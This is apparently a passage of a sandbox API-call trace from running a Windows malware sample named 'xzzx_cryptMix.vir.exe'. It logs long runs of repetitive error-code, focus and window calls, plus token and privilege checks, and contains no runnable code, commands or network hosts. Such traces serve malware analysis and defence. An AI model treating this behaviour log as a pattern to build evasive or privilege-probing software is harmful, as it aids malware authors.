!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿçÖ¸1\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.895] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x55842c78, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0083.895] GetLastError () returned 0x0 [0083.895] SetLastError (dwErrCode=0x0) [0083.895] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.896] SetLastError (dwErrCode=0x0) [0083.896] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.897] GetLastError () returned 0x0 [0083.897] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.898] SetLastError (dwErrCode=0x0) [0083.898] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.899] SetLastError (dwErrCode=0x0) [0083.899] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.900] SetLastError (dwErrCode=0x0) [0083.900] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.901] SetLastError (dwErrCode=0x0) [0083.901] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.902] GetLastError () returned 0x0 [0083.902] SetLastError (dwErrCode=0x0) [0083.903] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.903] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.903] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x558339aa) returned 0x0 [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.904] SetLastError (dwErrCode=0x0) [0083.904] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.905] SetLastError (dwErrCode=0x0) [0083.905] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.906] SetLastError (dwErrCode=0x0) [0083.906] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.907] GetLastError () returned 0x0 [0083.907] SetLastError (dwErrCode=0x0) [0083.908] IsClipboardFormatAvailable (format=0x0) returned 0 [0083.908] IsDlgButtonChecked (hDlg=0x0, nIDButton=0) returned 0x0 [0083.908] InflateRect (in: lprc=0x18f7a8, dx=1, dy=1 | out: lprc=0x18f7a8) returned 1 [0083.908] GetFocus () returned 0x0 [0083.908] GetConsoleTitleA (in: lpConsoleTitle=0x181870, nSize=0x400 | out: lpConsoleTitle="") returned 0x0 [0083.908] GetLastError () returned 0x578 [0083.909] SetLastError (dwErrCode=0x578) [0083.909] UpdateWindow (hWnd=0x76f) returned 0 [0083.909] GetLastError () returned 0x578 [0083.909] CreateMenu () returned 0x100fb [0083.909] CreatePopupMenu () returned 0x100fd [0083.909] CreatePopupMenu () returned 0x100ff [0083.909] SetMenu (hWnd=0x0, hMenu=0x100fb) returned 0 [0083.909] SetCapture (hWnd=0x0) returned 0x0 [0083.909] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0083.910] OleLoadPicture () returned 0x80004003 [0083.910] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0083.911] QuerySecurityPackageInfoA (in: pszPackageName=0x0, ppPackageInfo=0x0 | out: ppPackageInfo=0x0) returned 0x80090305 [0083.918] GetCapture () returned 0x0 [0083.918] BeginPaint (in: hWnd=0x0, lpPaint=0x18eaf0 | out: lpPaint=0x18eaf0) returned 0x0 [0083.918] EndPaint (hWnd=0x0, lpPaint=0x18eaf0) returned 0 [0083.918] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0084.706] GetDeviceCaps (hdc=0x1, index=4) returned 0 [0084.707] GetDeviceCaps (hdc=0x1, index=6) returned 0 [0084.707] GetDeviceCaps (hdc=0x1, index=8) returned 0 [0084.707] GetDeviceCaps (hdc=0x1, index=10) returned 0 [0084.707] GetEnhMetaFileA (lpName="emf") returned 0x0 [0084.707] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x6c, lpEnhMetaHeader=0x18ecc8 | out: lpEnhMetaHeader=0x18ecc8) returned 0x0 [0084.707] PlayEnhMetaFile (hdc=0x0, hmf=0x0, lprect=0x18f7b8) returned 0 [0084.707] DeleteEnhMetaFile (hmf=0x0) returned 0 [0084.707] GetSystemMenu (hWnd=0x0, bRevert=0) returned 0x0 [0084.707] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.707] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] SetFocus (hWnd=0x0) returned 0x0 [0084.708] GetModuleHandleA (lpModuleName="kernel32") returned 0x75ce0000 [0084.708] IsWindow (hWnd=0x0) returned 0 [0084.708] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xc, uEnable=0x0) returned 1 [0084.708] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0084.708] GetProcAddress (hModule=0x75ce0000, lpProcName="HeapCreate") returned 0x75cf4a2d [0084.708] SHGetMalloc (in: ppMalloc=0x18fe4c | out: ppMalloc=0x18fe4c*=0x764966bc) returned 0x0 [0084.709] SHGetDesktopFolder (in: ppshf=0x18fe48 | out: ppshf=0x18fe48*=0x311a2c) returned 0x0 [0084.717] IShellFolder:ParseDisplayName (in: This=0x311a2c, hwnd=0x0, pbc=0x0, pszDisplayName="", pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008 | out: pchEaten=0x18f4a4*=0xf000e, ppidl=0x18fe40, pdwAttributes=0x18f4b8*=0x90008) returned 0x0 [0084.717] IUnknown:Release (This=0x311a2c) returned 0x0 [0084.717] IUnknown:AddRef (This=0x764966bc) returned 0x1 [0084.717] SendMessageA (hWnd=0x0, Msg=0xba, wParam=0x0, lParam=0x0) returned 0x0 [0084.717] SendMessageA (hWnd=0x0, Msg=0xc9, wParam=0xffffffff, lParam=0x0) returned 0x0 [0084.717] SendMessageA (hWnd=0x0, Msg=0xbb, wParam=0xffffffff, lParam=0x0) returned 0x0 [0084.717] SendMessageA (hWnd=0x0, Msg=0xb0, wParam=0x0, lParam=0x0) returned 0x0 [0084.717] SendDlgItemMessageA (hDlg=0x1, nIDDlgItem=53340202, Msg=0x401, wParam=0x2, lParam=0x18f3ac) returned 0x0 [0084.717] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.717] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.717] GetLastError () returned 0x578 [0084.717] SetLastError (dwErrCode=0x578) [0084.717] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.717] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.717] GetCurrentThread () returned 0xfffffffe [0084.717] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.717] GetLastError () returned 0x3f0 [0084.717] GetCurrentProcess () returned 0xffffffff [0084.717] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.717] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.717] SetLastError (dwErrCode=0x522) [0084.717] CloseHandle (hObject=0x114) returned 1 [0084.717] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.717] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.717] GetLastError () returned 0x578 [0084.717] SetLastError (dwErrCode=0x578) [0084.718] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.718] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.718] GetCurrentThread () returned 0xfffffffe [0084.718] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.718] GetLastError () returned 0x3f0 [0084.718] GetCurrentProcess () returned 0xffffffff [0084.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.718] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.718] SetLastError (dwErrCode=0x522) [0084.718] CloseHandle (hObject=0x114) returned 1 [0084.718] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.718] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.718] GetLastError () returned 0x578 [0084.718] SetLastError (dwErrCode=0x578) [0084.718] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.718] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.718] GetCurrentThread () returned 0xfffffffe [0084.718] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.718] GetLastError () returned 0x3f0 [0084.718] GetCurrentProcess () returned 0xffffffff [0084.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.718] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.718] SetLastError (dwErrCode=0x522) [0084.718] CloseHandle (hObject=0x114) returned 1 [0084.718] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.718] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.718] GetLastError () returned 0x578 [0084.718] SetLastError (dwErrCode=0x578) [0084.718] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.718] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.718] GetCurrentThread () returned 0xfffffffe [0084.718] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.718] GetLastError () returned 0x3f0 [0084.718] GetCurrentProcess () returned 0xffffffff [0084.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.718] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, 